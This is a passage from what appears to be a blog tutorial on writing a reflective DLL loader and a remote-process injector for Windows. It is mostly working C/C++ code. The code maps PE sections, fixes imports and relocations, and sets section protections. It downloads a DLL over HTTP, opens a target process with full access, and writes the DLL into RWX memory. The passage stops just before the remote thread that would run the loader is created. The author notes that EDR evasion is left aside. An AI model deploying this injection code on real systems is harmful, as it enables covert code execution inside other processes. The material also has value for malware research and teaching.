//retrieving pointer to header we need
PIMAGE_OPTIONAL_HEADER pImgOptHdr = (PIMAGE_OPTIONAL_HEADER)((ULONG_PTR)pImgNtHdrs + sizeof(DWORD) + sizeof(IMAGE_FILE_HEADER));
ImgFileHdr = pImgNtHdrs->FileHeader;
/*--------------COPY SECTIONS IN MEMORY---------------------------*/
    
  //allocating memory for the PE in memory using the VA function pointer retrieved
  //using the custom implementation of GetProcAddress/GetModuleHandle
  if ((pebase = (PBYTE)VA(NULL, pImgOptHdr->SizeOfImage, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE)) == NULL)
        return FALSE;
    
  //allocate memory for an array of SECTION HEADERS
  peSections = (PIMAGE_SECTION_HEADER*)custom_malloc((sizeof(PIMAGE_SECTION_HEADER) * ImgFileHdr.NumberOfSections), VA);
  if (peSections == NULL)
        return FALSE;  
  //save pointers to sections inside the array of section headers
  for (int i = 0; i < ImgFileHdr.NumberOfSections; i++) {    
       peSections[i] = (PIMAGE_SECTION_HEADER)(((PBYTE)pImgNtHdrs) + 4 + 20 + ImgFileHdr.SizeOfOptionalHeader + (i * IMAGE_SIZEOF_SECTION_HEADER));
  }
  //copying the RAW data in the desired VirtualAddress
  for (int i = 0; i < ImgFileHdr.NumberOfSections; i++) {
       custom_memcpy(
           (PVOID)(pebase + peSections[i]->VirtualAddress),// Destination
           (PVOID)(dllBaseAddress + peSections[i]->PointerToRawData),// Source
           peSections[i]->SizeOfRawData// Size
       );
   }
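To see the copy step in isolation, here is the same idea on two plain buffers: a “file” and a zero-filled “image”. `SectionInfo` and `mapSections` are hypothetical names, and the bounds checks are something this sketch adds on top of what the loop above does.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <cstring>
#include <vector>

// The three section header fields used by the copy loop.
struct SectionInfo {
    std::uint32_t virtualAddress;   // where the section goes in the image (RVA)
    std::uint32_t pointerToRawData; // where the section is in the raw file
    std::uint32_t sizeOfRawData;    // how many bytes to copy
};

// Build the in-memory layout: a zero-filled buffer of sizeOfImage bytes with
// every section copied to its RVA. Returns an empty vector if a section does
// not fit in the file or in the image.
std::vector<std::uint8_t> mapSections(const std::vector<std::uint8_t>& raw,
                                      const std::vector<SectionInfo>& sections,
                                      std::uint32_t sizeOfImage) {
    std::vector<std::uint8_t> image(sizeOfImage, 0);
    for (const SectionInfo& s : sections) {
        std::uint64_t srcEnd = std::uint64_t(s.pointerToRawData) + s.sizeOfRawData;
        std::uint64_t dstEnd = std::uint64_t(s.virtualAddress) + s.sizeOfRawData;
        if (srcEnd > raw.size() || dstEnd > image.size()) return {};
        if (s.sizeOfRawData == 0) continue;  // nothing stored on disk for this section
        std::memcpy(image.data() + s.virtualAddress,
                    raw.data() + s.pointerToRawData,
                    s.sizeOfRawData);
    }
    return image;
}
```

A section stored at file offset 0x200 and mapped at RVA 0x1000 ends up 0xE00 bytes further away from the start than it was on disk, and the gap before it stays zero-filled.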

Once the sections are in memory at the correct virtual addresses, all the RVAs start to have some meaning. Hence we can now start fixing the Import Directory: go through the list of DLLs that our Reflective DLL needs to operate at full capabilities, load each of them, resolve the address of every imported function and write it into the IAT. To reach these structures we basically transform their RVAs into VAs (VA = ImageBase + RVA), where the ImageBase is the location we got in memory.

/*--------------FIX IAT TABLE--------------*/
   
 for (size_t i = 0; i < pImgOptHdr->DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].Size; i += sizeof(IMAGE_IMPORT_DESCRIPTOR)) {
        //retrieving pointer to image import descriptor
        pImgImpDesc = (PIMAGE_IMPORT_DESCRIPTOR)(pebase + pImgOptHdr->DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress + i);

        //the descriptor array ends with an all-zero entry: stop there
        //instead of passing an empty name to LoadLibraryA
        if (pImgImpDesc->Name == 0 && pImgImpDesc->FirstThunk == 0)
            break;

        //import DLL using LoadLibraryA retrieved via custom impl.
        //of GetModuleHandle/GetProcAddress
        dll = LLA((LPSTR)(pebase + pImgImpDesc->Name));
        if (dll == NULL) {
            return FALSE;
        }
        //gathering reference to ILT and IAT
        pOriginalFirstThunk = (PIMAGE_THUNK_DATA64)(pebase + pImgImpDesc->OriginalFirstThunk);
        pFirstThunk = (PIMAGE_THUNK_DATA64)(pebase + pImgImpDesc->FirstThunk);
        //both tables end with a zero entry
        while (pOriginalFirstThunk->u1.Function != 0 && pFirstThunk->u1.Function != 0) {
            //check if the function is referred via ordinal
            if (pOriginalFirstThunk->u1.Ordinal & 0x8000000000000000) {
                //retrieve the ordinal bytes
                //by keeping only the lower 16 bits
                ordinal = pOriginalFirstThunk->u1.Ordinal & 0xFFFF;
                //retrieve the function address
                funcAddress = GPARO(dll, (int)ordinal);
                if (funcAddress != nullptr)
                    //adjusting the IAT (address returned is summed to the DllBaseAddress)
                    pFirstThunk->u1.Function = (ULONGLONG)funcAddress;
            }
            else {
                //case the function can be found via its name
                pImgImportByName = (PIMAGE_IMPORT_BY_NAME)(pebase + pOriginalFirstThunk->u1.AddressOfData);
                funcAddress = GPAR(dll, pImgImportByName->Name);
                if (funcAddress != nullptr)
                    pFirstThunk->u1.Function = (ULONGLONG)funcAddress;
            }
            //moving to the next 
            pOriginalFirstThunk++;
            pFirstThunk++;
        }
    }
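The decision taken for every thunk in the loop above (ordinal or name?) depends only on the top bit of the 64-bit value, so it can be sketched without any Windows header. `ImportRef` and `decodeThunk64` are names made up for the example; the flag has the same value as IMAGE_ORDINAL_FLAG64, and according to the PE format the by-name case carries a 31-bit RVA to the hint/name entry.

```cpp
#include <cassert>
#include <cstdint>

// Same value as IMAGE_ORDINAL_FLAG64 in the Windows headers.
constexpr std::uint64_t kOrdinalFlag64 = 0x8000000000000000ULL;

// Decoded view of one entry of the import lookup table.
struct ImportRef {
    bool byOrdinal;             // true: import by ordinal, false: import by name
    std::uint16_t ordinal;      // valid when byOrdinal is true
    std::uint32_t hintNameRva;  // valid when byOrdinal is false
};

ImportRef decodeThunk64(std::uint64_t thunk) {
    ImportRef ref{};
    if (thunk & kOrdinalFlag64) {
        ref.byOrdinal = true;
        ref.ordinal = static_cast<std::uint16_t>(thunk & 0xFFFF);  // low 16 bits
    } else {
        ref.byOrdinal = false;
        ref.hintNameRva = static_cast<std::uint32_t>(thunk & 0x7FFFFFFF);
    }
    return ref;
}
```

So `decodeThunk64(0x8000000000000010)` is an import by ordinal 0x10, while `decodeThunk64(0x2A40)` says “go read the name at RVA 0x2A40”.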

Ok, at this point the IAT is fixed too, which means that when the DLL gets executed in memory within that process, it will know where to find the functions it needs. Time to apply base relocations now. I really suggest getting an overview of PE Base Relocations here, but what we can briefly say is this: when a program is built, a specific preferred base address (the ImageBase) is assumed for the executable. Various addresses are then computed from this base address and embedded within the executable. However, the executable is unlikely to be loaded at exactly this base address; it will probably be loaded at a different one, which makes all these embedded addresses invalid. To address this loading issue, a list of all the embedded values that require adjustment is stored in a dedicated table known as the Relocation Table. This table is referenced by the Base Relocation entry of the Data Directory and usually lives in the .reloc section. The process of relocation, carried out by the loader (and by our ReflectiveLoader function 😊), fixes these values so that they reflect the actual load address of the executable. More detailed information about relocation can be found here.

/*--------------APPLY BASE RELOCATIONS--------------*/
    //calculating the delta which is the difference between
    //the imagebase address hardcoded by the compiler and the 
    //actual base address
    delta = (ULONG_PTR)pebase - pImgOptHdr->ImageBase;
    //pointer to image relocation table
    pImgRelocation = (PIMAGE_BASE_RELOCATION)(pebase + pImgOptHdr->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress);

    while (pImgRelocation->VirtualAddress) {
        pRelocEntry = (PBASE_RELOCATION_ENTRY)(pImgRelocation + 1);
        //removing headers size and dividing by entry size
        //header is 8 bytes and the size of each entry is 2
        entriesCount = (int)((pImgRelocation->SizeOfBlock - 8) / 2);
        //loop through relocation entries 
        for (int i = 0; i < entriesCount; i++) {
            switch (pRelocEntry->Type) {
            case IMAGE_REL_BASED_DIR64: //type 0xA (10)
            {
                //The base relocation applies the difference to the 64-bit field at offset,
                //so we add the delta to the 64-bit value at that offset
                ULONGLONG* toAdjust = (ULONGLONG*)(pebase + pImgRelocation->VirtualAddress + pRelocEntry->Offset);
                *toAdjust += (ULONGLONG)delta;
                break;
            }
            case IMAGE_REL_BASED_HIGHLOW:
            {
                //The base relocation applies all 32 bits of the difference to the 32-bit field at offset.
                DWORD* toAdjust = (DWORD*)(pebase + pImgRelocation->VirtualAddress + pRelocEntry->Offset);
                *toAdjust += (DWORD)delta;
                break;
            }
            case IMAGE_REL_BASED_HIGH:
            {
                //The base relocation adds the high 16 bits of the difference to the 16-bit field at offset.
                //The 16-bit field represents the high value of a 32-bit word.
                WORD* toAdjust = (WORD*)(pebase + pImgRelocation->VirtualAddress + pRelocEntry->Offset);
                *toAdjust += HIWORD(delta);
                break;
            }
            case IMAGE_REL_BASED_LOW:
            {
                //The base relocation adds the low 16 bits of the difference to the 16-bit field at offset.
                //The 16-bit field represents the low half of a 32-bit word.
                WORD* toAdjust = (WORD*)(pebase + pImgRelocation->VirtualAddress + pRelocEntry->Offset);
                *toAdjust += LOWORD(delta);
                break;
            }
            case IMAGE_REL_BASED_ABSOLUTE:
                //The base relocation is skipped. This type can be used to pad a block
                break;
            }
            pRelocEntry++;
        }
        pImgRelocation = (PIMAGE_BASE_RELOCATION)(reinterpret_cast<DWORD_PTR>(pImgRelocation) + pImgRelocation->SizeOfBlock);
    }
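
If you want to play with the block walk without a real PE around, here is a minimal, portable sketch of the same idea on a fake image held in a std::vector. Everything in it is an assumption made for illustration: RelocBlockHeader, applyRelocations, makeFakeImage and the two constants are hypothetical stand-ins for the winnt.h definitions, only the DIR64 type is handled, and the walk is bounded by the directory size instead of stopping at a zero VirtualAddress.

```cpp
#include <cassert>
#include <cstdint>
#include <cstring>
#include <vector>

// Hypothetical stand-ins for the winnt.h definitions, so the sketch builds anywhere.
constexpr uint16_t REL_BASED_ABSOLUTE = 0;   // padding entry, skipped
constexpr uint16_t REL_BASED_DIR64    = 10;  // add delta to a 64-bit field

struct RelocBlockHeader {      // same layout as IMAGE_BASE_RELOCATION
    uint32_t VirtualAddress;   // RVA of the page this block describes
    uint32_t SizeOfBlock;      // 8-byte header + 2 bytes per entry
};

// Walks the relocation blocks stored at relocRva (relocSize bytes in total)
// and adds delta to every DIR64 target. Returns how many fields were patched.
inline int applyRelocations(std::vector<uint8_t>& image, uint32_t relocRva,
                            uint32_t relocSize, uint64_t delta) {
    int patched = 0;
    uint32_t cursor = relocRva;
    const uint32_t end = relocRva + relocSize;
    while (cursor + sizeof(RelocBlockHeader) <= end) {
        RelocBlockHeader hdr;
        std::memcpy(&hdr, image.data() + cursor, sizeof(hdr));
        if (hdr.SizeOfBlock < sizeof(hdr)) break;   // malformed block, stop here
        assert(cursor + hdr.SizeOfBlock <= image.size());
        const uint32_t entries = (hdr.SizeOfBlock - 8) / 2;
        for (uint32_t i = 0; i < entries; i++) {
            uint16_t entry;
            std::memcpy(&entry, image.data() + cursor + 8 + i * 2, sizeof(entry));
            const uint16_t type   = entry >> 12;      // high 4 bits
            const uint16_t offset = entry & 0x0FFF;   // low 12 bits
            if (type == REL_BASED_DIR64) {
                assert(hdr.VirtualAddress + offset + sizeof(uint64_t) <= image.size());
                uint8_t* target = image.data() + hdr.VirtualAddress + offset;
                uint64_t value;
                std::memcpy(&value, target, sizeof(value));
                value += delta;
                std::memcpy(target, &value, sizeof(value));
                patched++;
            }
            // REL_BASED_ABSOLUTE (and any other type) is left alone in this sketch
        }
        cursor += hdr.SizeOfBlock;
    }
    return patched;
}

// Fake 0x2000-byte image: one pointer at RVA 0x1010, one relocation block at RVA 0x1800.
inline std::vector<uint8_t> makeFakeImage(uint64_t pointerValue) {
    std::vector<uint8_t> image(0x2000, 0);
    std::memcpy(image.data() + 0x1010, &pointerValue, sizeof(pointerValue));
    const RelocBlockHeader hdr{0x1000, 12};   // page 0x1000, header + 2 entries
    const uint16_t entries[2] = {
        static_cast<uint16_t>((REL_BASED_DIR64 << 12) | 0x010),
        static_cast<uint16_t>(REL_BASED_ABSOLUTE << 12)   // padding entry
    };
    std::memcpy(image.data() + 0x1800, &hdr, sizeof(hdr));
    std::memcpy(image.data() + 0x1808, entries, sizeof(entries));
    return image;
}
```

With a pointer that was built for base 0x180000000 and a delta of 0x10000, calling applyRelocations(image, 0x1800, 12, 0x10000) patches exactly one field, and the value at RVA 0x1010 moves from 0x180001000 to 0x180011000.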

Let’s take a look at our TO-DO list and see what’s missing:

  • Mapping sections in the Virtual Memory
  • Fixing the Import Address Table (IAT)
  • Adjust the Base Relocation table
  • Assign correct memory protection to any Virtual Sections
  • Flushing CPU instructions cache
  • Running the DllMain entry point

As we saw before in PE-bear, all the raw data must be mapped into the virtual sections, and each section has its own memory protection. We want to be sure we assign the right protection to every section:

/*-------------ADJUST MEMORY PROTECTIONS BASING ON SECTIONS HEADERS*/

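 for (int i = 0; i < ImgFileHdr.NumberOfSections; i++) {
     //the checks below go from the least to the most specific combination,
     //so the last one that matches decides the final protection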
     if (peSections[i]->Characteristics & IMAGE_SCN_MEM_WRITE) {//write
         dwProtection = PAGE_WRITECOPY;
     }
     if (peSections[i]->Characteristics & IMAGE_SCN_MEM_READ) {//read
         dwProtection = PAGE_READONLY;
     }
     if (peSections[i]->Characteristics & IMAGE_SCN_MEM_EXECUTE) {//exec
         dwProtection = PAGE_EXECUTE;
     }
     if (peSections[i]->Characteristics & IMAGE_SCN_MEM_READ && peSections[i]->Characteristics & IMAGE_SCN_MEM_WRITE) { //readwrite
         dwProtection = PAGE_READWRITE;
     }
     if (peSections[i]->Characteristics & IMAGE_SCN_MEM_EXECUTE && peSections[i]->Characteristics & IMAGE_SCN_MEM_WRITE) { //executewrite
         dwProtection = PAGE_EXECUTE_WRITECOPY;
     }
     if (peSections[i]->Characteristics & IMAGE_SCN_MEM_EXECUTE && peSections[i]->Characteristics & IMAGE_SCN_MEM_READ) { //executeread

         dwProtection = PAGE_EXECUTE_READ;
     }
     if (peSections[i]->Characteristics & IMAGE_SCN_MEM_EXECUTE && peSections[i]->Characteristics & IMAGE_SCN_MEM_READ && peSections[i]->Characteristics & IMAGE_SCN_MEM_WRITE) { //executereadwrite

         dwProtection = PAGE_EXECUTE_READWRITE;
     }
      //virtual protect function retrieved via GPAR and GMHR
     if (!VP((PVOID)(pebase + peSections[i]->VirtualAddress), peSections[i]->SizeOfRawData, dwProtection, &dwOldProtection)) {
         return FALSE;
     }
 }
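
The chain of ifs above can also be read as a lookup on three bits (execute, read, write). Here is a minimal sketch of that idea, not the code used in the loader: sectionProtection is a hypothetical helper, and the constants are redefined with the values documented for winnt.h only so that the snippet builds on any platform. Returning PAGE_NOACCESS for a section with no flags at all is my own assumption, the original loop simply keeps the previous value in that case.

```cpp
#include <cassert>   // only needed for the sanity checks in the usage note
#include <cstdint>

// Values documented for winnt.h, redefined here so the sketch builds anywhere.
constexpr uint32_t SCN_MEM_EXECUTE = 0x20000000;
constexpr uint32_t SCN_MEM_READ    = 0x40000000;
constexpr uint32_t SCN_MEM_WRITE   = 0x80000000;

constexpr uint32_t PG_NOACCESS          = 0x01;
constexpr uint32_t PG_READONLY          = 0x02;
constexpr uint32_t PG_READWRITE         = 0x04;
constexpr uint32_t PG_WRITECOPY         = 0x08;
constexpr uint32_t PG_EXECUTE           = 0x10;
constexpr uint32_t PG_EXECUTE_READ      = 0x20;
constexpr uint32_t PG_EXECUTE_READWRITE = 0x40;
constexpr uint32_t PG_EXECUTE_WRITECOPY = 0x80;

// Maps section Characteristics to a page protection constant.
inline uint32_t sectionProtection(uint32_t characteristics) {
    // index bits: 4 = execute, 2 = read, 1 = write
    static const uint32_t table[8] = {
        PG_NOACCESS,           // ---  (assumption, see the text above)
        PG_WRITECOPY,          // --W
        PG_READONLY,           // -R-
        PG_READWRITE,          // -RW
        PG_EXECUTE,            // X--
        PG_EXECUTE_WRITECOPY,  // X-W
        PG_EXECUTE_READ,       // XR-
        PG_EXECUTE_READWRITE   // XRW
    };
    unsigned index = 0;
    if (characteristics & SCN_MEM_EXECUTE) index |= 4;
    if (characteristics & SCN_MEM_READ)    index |= 2;
    if (characteristics & SCN_MEM_WRITE)   index |= 1;
    return table[index];
}
```

For instance, a typical .text section (Characteristics 0x60000020) gives assert(sectionProtection(0x60000020) == PG_EXECUTE_READ), while a typical .data section (0xC0000040) ends up as PG_READWRITE.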

Finally, in order to complete the loading process:

/*--------------FLUSHING INSTRUCTION CACHE ALLA FEWER*/
 //as mentioned here https://github.com/stephenfewer/ReflectiveDLLInjection/blob/master/dll/src/ReflectiveLoader.c
 //We must flush the instruction cache to avoid stale code being used which was updated by our relocation processing.
 FIC((HANDLE)-1, NULL, 0x00);
 
 /*--------------EXECUTE ENTRY POINT--------------*/
 pDllMain = (fnDllMain)(pebase + pImgNtHdrs->OptionalHeader.AddressOfEntryPoint);
 return pDllMain((HMODULE)pebase, DLL_PROCESS_ATTACH, NULL);

Reflective DLL Injector

In the journey of “Inject a Reflective DLL” we are still missing the injection part. Our DLL is ready to load itself and shine, however it still needs to be placed into a remote process and the ReflectiveLoader function has to be executed. Step by step, what does our injector have to do?

  • Download/Read our DLL bytes
  • Find the RAW address of the ReflectiveLoader function
  • Allocate Memory in the remote process
  • Write the RAW bytes in the remote memory location
  • Create a remote thread that would run the “ReflectiveLoader” function

First things first. Let’s download the DLL (skipping the argument parsing part, you can find the full code here):

//function to download the payload via HTTP
vector<char> downloadFromURL(IN LPCSTR url) {
  IStream* stream = NULL;
  vector<char> buffer;
  //URLOpenBlockingStreamA returns an HRESULT, S_OK on success
  if (FAILED(URLOpenBlockingStreamA(0, url, &stream, 0, 0)))
  {
    cout << "[-] Error occurred while downloading the file" << endl;

    return buffer;
  }
  //we work with C++ so let's enjoy the vector class
  char chunk[4096];
  unsigned long bytesRead = 0;
  while (true)
  {
    HRESULT hr = stream->Read(chunk, sizeof(chunk), &bytesRead);
    //stop on error or when there is nothing left to read
    if (FAILED(hr) || 0U == bytesRead)
    {
      break;
    }
    //append only the bytes actually read, so a short read never leaves a gap in the buffer
    buffer.insert(buffer.end(), chunk, chunk + bytesRead);
  }
  stream->Release();
  return buffer;
}

There are different methods that can be used to download a file; I haven’t tested any of them in terms of OPSEC, I just used the one I knew. After that, we want to know the PID of the process we want to inject our Reflective DLL into:

int RetrievePIDbyName(wchar_t* procName) {
    HANDLE hProcessSnap;
    PROCESSENTRY32 pe32;

    //to lower case the procname
    ToLowerCaseWIDE(procName);

    // Take a snapshot of all processes in the system.
    hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (hProcessSnap == INVALID_HANDLE_VALUE) {
        std::cout << "[-] Unable to create snapshot of processes!" << std::endl;
        return 0;
    }

    // Set the size of the structure before using it.
    pe32.dwSize = sizeof(PROCESSENTRY32);

    // Retrieve information about the first process and exit if unsuccessful.
    if (!Process32First(hProcessSnap, &pe32)) {
        std::cout << "[-] Unable to retrieve information about the first process!" << std::endl;
        CloseHandle(hProcessSnap);
        return 0;
    }

    // Walk the snapshot until we find the process we are looking for.
    do {

        ToLowerCaseWIDE(pe32.szExeFile);
        if (wcscmp((pe32.szExeFile), procName) == 0) {
            CloseHandle(hProcessSnap);
            return pe32.th32ProcessID;
        }

    } while (Process32Next(hProcessSnap, &pe32));

    // Close the snapshot handle to release resources.
    CloseHandle(hProcessSnap);
    return 0;
}
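
The ToLowerCaseWIDE helper is not shown in this post, so here is one possible shape for it, as a minimal sketch rather than the actual implementation. matchesProcessName is a hypothetical name that just mirrors the comparison done in the loop above; it assumes plain ASCII executable names, which is all that towlower is guaranteed to handle in the default locale.

```cpp
#include <cassert>
#include <cwchar>
#include <cwctype>

// One possible shape for ToLowerCaseWIDE: lowercases the string in place.
inline void ToLowerCaseWIDE(wchar_t* text) {
    if (text == nullptr) return;
    for (; *text != L'\0'; ++text) {
        *text = static_cast<wchar_t>(std::towlower(static_cast<wint_t>(*text)));
    }
}

// Mirrors the check in the snapshot loop: lowercase the candidate, then compare exactly.
// wantedLowercase is expected to be lowercase already.
inline bool matchesProcessName(wchar_t* candidate, const wchar_t* wantedLowercase) {
    assert(candidate != nullptr && wantedLowercase != nullptr);
    ToLowerCaseWIDE(candidate);
    return std::wcscmp(candidate, wantedLowercase) == 0;
}
```

So a snapshot entry named L"Notepad.EXE" matches a request for L"notepad.exe", while L"Explorer.EXE" does not.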

Here you can definitely work on the OPSEC side of things. But since bleeding-edge techniques to bypass EDR are not the topic of this blog, we move forward to open a handle to the remote process and inject our beloved DLL:

/*----------OPEN HANDLE TO REMOTE PROCESS PLEASE----------*/

HANDLE hProc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
if (hProc == NULL) {
    cout << "[-] Error while opening the handle to process, exiting ... " << endl;
    return 1;
}
/*--------USEFUL FUNCTION TO ADD THE INFAMOUS HEADER-------------------*/
char * addHeaderToBuffer(PBYTE dll, size_t dllSize) {
    //I create a new buffer big as the dll + header
    char* newDll = new char[dllSize + HEADER_SIZE];
    //i write the dll HEADER_SIZE bytes forward so that i have the space for the header
    memmove(newDll + HEADER_SIZE, dll, dllSize);
    // Copy the header to the beginning of the dll buffer this time
    //since now i can overwrite those
    memcpy(newDll, HEADER, HEADER_SIZE);

    return newDll;
}
/*---------SOMEWHERE ELSE IN THE CODE WE DEFINE THE FUNCTION-----*/
PBYTE InjectDllRemoteProcess(int pid, size_t dllSize, PBYTE dllBuffer, HANDLE hProc) {
    SIZE_T bytesWritten = 0;
    PBYTE dllBufferFinal = (PBYTE)addHeaderToBuffer(dllBuffer, dllSize);
    //it's important to make some space also for the header
    PBYTE dllDestination = (PBYTE)VirtualAllocEx(hProc, NULL, dllSize + HEADER_SIZE, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (dllDestination == NULL) {
        cout << "[-] Error while allocating memory in remote process, exiting ... " << endl;
        delete[] (char*)dllBufferFinal;
        return NULL;
    }
    if (WriteProcessMemory(hProc, dllDestination, dllBufferFinal, dllSize + HEADER_SIZE, &bytesWritten))
    {
        printf("[+] Successfully wrote DLL bytes + header at remote address: %p\n", dllDestination);
    }
    else {
        //grab the error code right away, before any other call can overwrite it
        DWORD lastError = GetLastError();
        cout << "[-] Error while writing the DLL in the remote process, exiting ... " << endl;
        //stream the code with <<, since "literal" + number would be pointer arithmetic
        cerr << "[-] Win32 API Error: " << lastError << endl;
        delete[] (char*)dllBufferFinal;
        return NULL;
    }
    //the local copy allocated with new[] in addHeaderToBuffer is no longer needed
    delete[] (char*)dllBufferFinal;
    return dllDestination;

}
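
Since we are in C++ anyway, the header trick can also be written with a std::vector, which removes the need to remember a delete[] on every exit path. This is a minimal sketch and not the code used in the injector: prependHeader, kHeader and kHeaderSize are hypothetical names, and the egg bytes are made up (the real HEADER and HEADER_SIZE are defined elsewhere in the project).

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <vector>

// Made-up egg, for illustration only.
static const uint8_t kHeader[] = { 0x41, 0x41, 0x41, 0x41, 0x42, 0x42, 0x42, 0x42 };
constexpr size_t kHeaderSize = sizeof(kHeader);

// Returns the header followed by the untouched DLL bytes.
// The vector releases its memory on its own when it goes out of scope.
inline std::vector<uint8_t> prependHeader(const uint8_t* dll, size_t dllSize) {
    assert(dll != nullptr || dllSize == 0);
    std::vector<uint8_t> out;
    out.reserve(kHeaderSize + dllSize);
    out.insert(out.end(), kHeader, kHeader + kHeaderSize);
    if (dllSize > 0) {
        out.insert(out.end(), dll, dll + dllSize);
    }
    return out;
}
```

The result can be handed to WriteProcessMemory through out.data() and out.size(); the DLL itself then starts kHeaderSize bytes into the remote allocation.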

Cool, if we haven’t got any error it means our DLL is injected in the target process. We now need to find the offset, within the RAW bytes, at which our ReflectiveLoader function starts. This is because we want to create a thread in the remote process that runs the ReflectiveLoader function, and the DLL in the remote process is still in a “raw” state. A little problem arises here: nothing in the PE headers points directly to the raw file offset of a function 😮 As we saw in the PE structure, functions, variables, etc. are referenced through RVAs, which are valid once the sections are mapped into virtual memory, but not in the RAW data.

Nonetheless, we can find what we want, which is basically an RRA (relative raw address). If you think about it, in the section headers we have a pointer to the beginning of each section’s raw data (PointerToRawData); moreover, we also know that the distance between the beginning of a section and the function we want to retrieve is the same in the RAW data as in the virtually mapped memory. In fact, if you remember, that’s how we copied the data to its virtual address:

//copying the RAW data in the desired VirtualAddress
  for (int i = 0; i < ImgFileHdr.NumberOfSections; i++) {
       custom_memcpy(
           (PVOID)(pebase + peSections[i]->VirtualAddress),// Destination
           (PVOID)(dllBaseAddress + peSections[i]->PointerToRawData),// Source
           peSections[i]->SizeOfRawData// Size
       );
   }

Therefore, a function can do the math for us:

DWORD Rva2Raw(DWORD rva, vector<PIMAGE_SECTION_HEADER> peSections, int numberOfSections) {
    for (int i = 0; i < numberOfSections; i++) {
        //sections might have different offset, so we need to find the one where our RVA is falling into
        if (rva >= peSections[i]->VirtualAddress && rva < (peSections[i]->VirtualAddress + peSections[i]->Misc.VirtualSize))
        {
            //so computing first the "distance" between the virtual beginning of the virtual section to the RVA
            //then adding that to the beginning of the same section but raw 
            return ((rva - peSections[i]->VirtualAddress) + peSections[i]->PointerToRawData);
        }
    }
    return 0; //the RVA does not fall into any section
}
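
To make the math concrete, here is a small portable sketch with made-up numbers. FakeSection, rvaToRaw and typicalLayout are hypothetical names: the struct carries only the three fields that Rva2Raw reads from IMAGE_SECTION_HEADER, and the layout values are invented for the example.

```cpp
#include <cassert>   // only needed for the sanity checks in the usage note
#include <cstdint>
#include <vector>

struct FakeSection {             // just the fields Rva2Raw looks at
    uint32_t VirtualAddress;     // where the section starts once mapped (RVA)
    uint32_t VirtualSize;        // how big it is once mapped
    uint32_t PointerToRawData;   // where the section starts in the file
};

// Same logic as Rva2Raw, on the simplified struct.
inline uint32_t rvaToRaw(uint32_t rva, const std::vector<FakeSection>& sections) {
    for (const FakeSection& s : sections) {
        if (rva >= s.VirtualAddress && rva < s.VirtualAddress + s.VirtualSize) {
            // distance from the start of the section, re-based on the raw start
            return (rva - s.VirtualAddress) + s.PointerToRawData;
        }
    }
    return 0;   // the RVA does not fall into any section
}

// Invented layout: two sections, file alignment 0x200, section alignment 0x1000.
inline std::vector<FakeSection> typicalLayout() {
    return {
        { 0x1000, 0x1A00, 0x0400 },   // .text
        { 0x3000, 0x0C00, 0x1E00 },   // .rdata
    };
}
```

With this layout, RVA 0x1234 sits 0x234 bytes into .text, so its raw offset is 0x400 + 0x234 = 0x634; in the same way RVA 0x3010 becomes 0x1E10, and an RVA outside every section, such as 0x5000, gives 0.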

Back to our code flow, now we can find the “RRA” of the ReflectiveLoader function:

LPVOID RetrieveLoaderPointer(PBYTE dllBase) {

    LPVOID exportedFuncAddrRVA = NULL;

    PIMAGE_DOS_HEADER pDosHeader = (PIMAGE_DOS_HEADER)dllBase; 
    if (pDosHeader->e_magic != IMAGE_DOS_SIGNATURE) {
        return NULL;
    }
    PIMAGE_NT_HEADERS pNtHeader = (PIMAGE_NT_HEADERS)(dllBase + pDosHeader->e_lfanew);
    if (pNtHeader->Signature != IMAGE_NT_SIGNATURE) {
        return NULL;
    }
    IMAGE_FILE_HEADER fileHeader = pNtHeader->FileHeader;
    IMAGE_OPTIONAL_HEADER optionalHeader = pNtHeader->OptionalHeader;

    vector<PIMAGE_SECTION_HEADER> peSections;

    for (int i = 0; i < fileHeader.NumberOfSections; i++) {
    
        //starting from the pointer to NT header + 4(signature) + 20(file header) + size of optional = pointer to first section header. 
        // to get to the next i multiply the index running through the number of sections multiplied by the size of section header 
        peSections.insert(peSections.begin(), (PIMAGE_SECTION_HEADER)(((PBYTE)pNtHeader) + 4 + 20 + fileHeader.SizeOfOptionalHeader + (i * IMAGE_SIZEOF_SECTION_HEADER)));
     
    }  
    //FROM HERE ONWARDS WE START PLAYING WITH RVAs, THEREFORE WE NEED TO FIND THE OFFSETS IN THE RAW FILE
    //going through the export directory to find the ReflectiveLoader function we want to invoke
    PIMAGE_EXPORT_DIRECTORY pExportDirectory = (PIMAGE_EXPORT_DIRECTORY)(dllBase + Rva2Raw(optionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress, peSections, (int)fileHeader.NumberOfSections));
    PDWORD FunctionNameArray = (PDWORD) (dllBase + Rva2Raw(pExportDirectory->AddressOfNames, peSections, (int)fileHeader.NumberOfSections));
    PDWORD FunctionAddressArray = (PDWORD) (dllBase + Rva2Raw(pExportDirectory->AddressOfFunctions, peSections, (int)fileHeader.NumberOfSections));
    PWORD  FunctionOrdinalArray = (PWORD) (dllBase + Rva2Raw(pExportDirectory->AddressOfNameOrdinals, peSections, (int)fileHeader.NumberOfSections));

    //only NumberOfNames exports have a name, and each name maps to its address through the ordinal array
    for (DWORD i = 0; i < pExportDirectory->NumberOfNames; i++) {
        //resolve the i-th name inside the loop, otherwise only the first export would ever be compared
        char* functionName = (CHAR*)(dllBase + Rva2Raw(FunctionNameArray[i], peSections, (int)fileHeader.NumberOfSections));
        if (strcmp(functionName, EXPORTED_FUNC_NAME) == 0) {
            //despite the variable name, what we store here is the RAW offset of the function
            exportedFuncAddrRVA = (LPVOID)(ULONG_PTR) Rva2Raw(FunctionAddressArray[FunctionOrdinalArray[i]], peSections, (int)fileHeader.NumberOfSections);
            break;
        }
    }
    return exportedFuncAddrRVA; 
}

Beautiful, now we have the RRA of the ReflectiveLoader function, so in order to invoke it in the remote process we need to create a remote thread that uses the code at that address as its starting point. We also know the base address of the DLL in the remote process, because that’s exactly the address returned by the VirtualAllocEx function!

/*--------CREATE REMOTE THREAD---------------------------------------*/

 //here we know the relative address of the ReflectiveFunction in the RAW data section
 //therefore we can invoke that function in the remote process. 
 DWORD threadId = 0x0;
 HANDLE hThread = NULL;
